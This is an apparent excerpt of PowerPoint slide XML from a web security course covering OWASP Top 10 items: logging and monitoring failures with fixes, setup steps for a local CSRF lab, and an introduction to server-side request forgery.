          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>This is particularly important when your software distribution system is uncontrolled.  Linux Distributions, for example frequently are hosted by a large number of servers which are run by volunteers.  It is possible that if one is compromised the distribution could be replaced by one containing malicious code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>The software vendor can make this difficult by publishing the hash values for all the current version of their software on their website.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2513439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7922-9AA7-E910-2B66-6749A186E0DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A09:2021 – Security Logging and Monitoring Failures </a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1C7299B-A968-A498-324A-E265DF31D405}"/>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753784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AE5B-F712-8CC3-40B0-82CD65486217}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A09:2021 – Security Logging and Monitoring Failures </a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2ABCBFE3-CAF4-380B-EE94-03B01CE284A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>Logging is an important if unexciting part of web application security.  As a general rule any event that could have a security impact should be logged.  Logs should be periodically reviewed by qualified staff and suspicious events or clusters of suspicious events should provide alerts notifying the security team.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>Types of logging failures include:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>Failing to log auditable events.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>Maintaining only local copies of log files.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>Ineffective or missing alert thresholds.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2063255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A09:2021 – Security Logging and Monitoring Failures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89"/>
            <a:ext cx="10658529" cy="3990759"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Examples:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="201168" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Failing to Log </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0" err="1">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Audiable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> Events:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Events that relate to your web application’s security do not only include events which could prevent an attack but also events that would help you find the cause of an attack.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="201168" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>For example, a hypothetical web application where users log-in thousands of times per day.  To keep the log size more manageable and to avoid the performance hit that comes from logging.  The developers decide to only post an entry to a logfile if a user gets their password wrong three times in a row.  Otherwise, the login attempt is not tracked.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="201168" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>This seems like a reasonable security measure, but it’s based on the developer’s expectation that an attacker will try to gain access to their system by taking one account and make multiple attempts on its password.  However, the attacker could, just as easily spread their attempts across many accounts over the course of a month.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="201168" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>This would be virtually invisible to the proposed logging system.  Not only that but there is no information for the security team to determine how the attack occurred when it is finally discovered.  Information that can lead you to determine the cause of an attack (sometimes called “root cause analysis”) is referred to as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="1" u="sng" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>auditable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> and should be recorded.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="201168" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-CA" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="201168" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How to fix:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>L</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>og anything that represents a security concern OR could be used to determine how a break in occurred.  This can include login attempts, software exceptions, script execution times and script memory usage.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="201168" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49"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194374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A09:2021 – Security Logging and Monitoring Failures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89"/>
            <a:ext cx="10658529" cy="3990759"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="201168" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Maintaining Only Local Logs:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> One of the issues security researches have with analyzing log files is determining if they represent a true picture of events.  The veracity of logs can be compromised in two major ways when log files exist purely on the same machine that your web application is running on.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="201168" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>One would be that when a machine is compromised it isn’t uncommon for the attacker to gain significant privilege on the compromised machine.  Often enough to alter or destroy the log files.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="201168" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>The second is that a web application may, for performance reasons be spread across multiple machines.  Local logs then only provide a small portion of the overall effect an attack is having on a system.</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" dirty="0">
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="201168" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-CA" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="201168" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How to fix:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A central log repository should be maintained.  This provides a number of benefits including:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-CA" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A way to separate the privileges of individual servers from the logging system.  Servers would only have the ability to post logs not change them.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-CA" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Provides a backup in case local logs are destroyed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-CA" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Allows for aggregate log analysis. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="201168" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49"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3798220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A09:2021 – Security Logging and Monitoring Failures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89"/>
            <a:ext cx="10658529" cy="3990759"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="201168" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Ineffective or Missing Alerts: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>All logging systems should have thresholds defined for any series of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>behaviours</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> that imply a significant security problem – such as a number of failed login attempts.  When a system reaches these thresholds, an appropriate action should take place (alert a security professional).  These thresholds should not cause problems of their own.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="201168" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Security thresholds frequently fall into one of three different categories of problematic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>behaviour</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="544068" lvl="1" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Thresholds are missing or too complex:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> In this case many important security events result in no action being taken. E.g., Only alerting someone if they fail to enter their password correctly 1000 times.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="544068" lvl="1" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Thresholds are too simple:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> These produce so many security alerts that the system responding to them can’t process them all. E.g., Alerting the security team every time someone fails to enter their password. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="544068" lvl="1" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Thresholds take action that is too strict: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Many systems will disable an account if the number of failed password attempts reaches a specific threshold.  If this threshold is sufficiently low, it can be used to launch a DoS (Denial of Service) attack. E.g., By deliberately causing multiple failed password attempts an attacker could lock everyone out of the system.</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="201168" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How to fix: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Alert thresholds must be constantly reviewed and adjusted.  Standards for incident response teams must clearly outline what action they should take. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="201168" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49"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05117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Getting started</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t>To follow along download the zip file marked “CSRF Example.zip” and extract its contents into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>C:\xampp\htdocs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This archive contains two php scripts:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>caribou_computers2.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>caribou_admin.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> and one HTML file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>evilsite2.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There is also an SQL script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>caribou_computers.sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>import that through phpMyAdmin.  This will re-create the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ontario_computers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> database and add a new comments table.</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cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Once you do that you can point your browser at: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://127.0.0.1/CSRF%20Example/caribou_computers2.php</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cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Since we re-created the DB we will need to create a new account.</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17901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7922-9AA7-E910-2B66-6749A186E0DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A10:2021 – Server-Side Request Forgery (SSRF)</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1C7299B-A968-A498-324A-E265DF31D405}"/>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61558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AE5B-F712-8CC3-40B0-82CD65486217}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A10:2021 – Server-Side Request Forgery (SSRF)</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2ABCBFE3-CAF4-380B-EE94-03B01CE284A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>Server-Side Request Forgery occurs because modern web application environments (SaaS, PaaS, Internet Appliances) are often designed to be operated entirely from HTTP Requests.  Because of this many types of interfaces (administrative, usage tracking) can be operated over HTTP. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>When a public facing web application relies on services like this on the backend.   It opens up the possibility for attackers to fool the web application into passing HTTP Requests on to these backend systems resulting in access to administrative tools, sensitive information or even just mapping your internal network.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3626595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AE5B-F712-8CC3-40B0-82CD65486217}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A10:2021 – Server-Side Request Forgery (SSRF)</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2ABCBFE3-CAF4-380B-EE94-03B01CE284A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>Examples:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>The Siemens makes an application DB4WEB which is used to aggregate data from a variety of different sources: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0">
